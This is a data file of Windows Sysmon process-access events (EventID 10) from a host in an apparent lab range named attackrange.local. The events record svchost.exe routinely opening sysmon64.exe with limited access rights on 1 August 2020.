{"EventTime":"2020-08-01 05:55:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6058,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:55.694\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:55.694","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6059,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:55.694\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:55.694","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6060,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:55.694\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:55.694","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6061,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:55.694\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:55.694","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6062,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:55.694\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:55.694","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6063,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:55.694\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:55.694","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6064,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:55.694\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:55.694","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6065,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:55.694\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:55.694","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
